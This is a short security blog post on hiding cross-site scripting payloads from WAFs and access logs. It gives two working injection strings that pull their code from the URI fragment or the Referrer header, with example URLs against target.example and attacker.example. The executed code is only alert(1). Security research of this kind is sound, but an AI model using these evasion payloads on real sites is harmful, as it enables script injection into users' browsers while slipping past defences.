Concealing XSS payloads

Published: Aug 22 2025

Updated: Aug 22 2025

PortSwigger “Concealing payloads in URL credentials” talks about concealing XSS payloads in URL credentials. The nice thing is that this makes the payload invisible to WAFs and other server-side XSS filters. You can actually conceal the payloads in other places

Table of content

Table of content
Concealing payload in the URI fragment
Concealing payload in the Referrer header field
References

Concealing payload in the URI fragment

<img src=x
     data-a=defaultView
     data-b=Function
     onerror=ownerDocument[dataset.a][dataset.b](ownerDocument[dataset.a].location.hash.substring(1))()>

Used as:

http://target.example/?q=<img src=x data-a=defaultView data-b=Function onerror=ownerDocument[dataset.a][dataset.b](ownerDocument[dataset.a].location.hash.substring(1))()>#alert(1)

The malicious payload in the URI fragment is not visible by WAFs and such and can therefore not be filtered by this type of tools. Moreover it is not visible in access logs.

Concealing payload in the Referrer header field

<img src=x
     data-a=defaultView
     data-b=Function
     onerror=ownerDocument[dataset.a][dataset.b](ownerDocument[dataset.a].URL.parse(ownerDocument.referrer).search.substring(1))()>

Used as:

http://target.example/?q=<img src=x data-a=defaultView data-b=Function onerror=ownerDocument[dataset.a][dataset.b](ownerDocument[dataset.a].URL.parse(ownerDocument.referrer).search.substring(1))()>

Coming from:

http://attacker.example/?alert(1)

In contrast to the previous approach, this one might be seen by WAFs and will often appear in access logs.

References

Concealing payloads in URL credentials (PortSwigger)
Bypassing WAFs with the phantom $Version cookie (PortSwigger)